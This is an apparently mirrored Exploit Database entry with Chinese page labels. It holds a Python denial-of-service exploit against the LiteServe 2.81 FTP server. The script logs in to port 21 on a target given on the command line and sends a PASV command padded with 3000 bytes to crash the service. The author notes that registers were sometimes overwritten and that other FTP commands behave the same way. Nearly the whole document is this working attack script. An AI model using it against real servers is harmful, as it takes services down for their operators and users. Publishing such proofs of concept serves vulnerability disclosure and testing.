LiteServe 2.81 – ‘PASV’ Denial of Service

• Exploit Database
• 12 阅读

• 作者： Craig Freyman
  日期： 2011-08-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17638/

• #!/usr/bin/python
  #Title: LiteServe 2.81 PASV Command DoS
  #Author: Craig Freyman (@cd1zz)
  #Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
  #Tested on Windows XP SP3 and Server 2003 SP2
  #Software: http://www.cmfperception.com/liteserve.html
  #Notes: In certain conditions that I could not reproduce reliably, registers were
  #overwritten. There are a number of other FTP commands that exhibit the same behavior.
  
  import socket,sys,time,struct
  
  if len(sys.argv) < 2:
   print "[-]Usage: %s <target addr> " % sys.argv[0]
   sys.exit(0)
  
  target = sys.argv[1]
  
  if len(sys.argv) > 2:
   platform = sys.argv[2]
  
  crash = "\x41" * 3000
  
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  
  try:
  s.connect((target,21))
  except:
  print "[-] Connection to "+target+" failed!"
  sys.exit(0)
  
  print "[*] Sending " + `len(crash)` + " byte crash..."
  
  s.send("USER test\r\n")
  s.recv(1024)
  s.send("PASS test\r\n")
  s.recv(1024)
  s.send("PASV "+crash+"\r\n")
  print "Sleeping..."
  time.sleep(5)
  s.close()